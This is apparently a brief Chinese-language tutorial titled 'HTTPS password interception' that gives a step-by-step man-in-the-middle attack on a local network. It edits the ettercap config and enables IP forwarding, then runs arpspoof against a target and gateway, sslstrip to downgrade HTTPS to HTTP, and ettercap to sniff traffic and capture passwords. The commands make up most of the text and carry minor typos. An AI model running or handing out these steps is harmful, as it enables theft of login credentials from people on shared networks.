HTTPS密码截取



使用工具:

sslstrip   ====》把HTTPS的链接还原为HTTP

Ettercap  ==   DNS欺骗  流量嗅探

ettercap

 

目标IP192.168.1.100

网关IP192.168.1.1

***者192.168.1.101

 

Vim /etc/ettercap/etter.conf(需要修改此配置文件)(找到这行把后两行#去掉)

 HTTPS密码截取

 

echo 1 >/proc/sys/net/ipv4/ip_forward   

arpspoof -i etho  -t 192.168.1.100192.168.1.1

sslstrip -a  -f  -k

ettercap  –Tq  -i eth0 

        

HTTPS容易出现证书错误


附件:http://down.51cto.com/data/2367422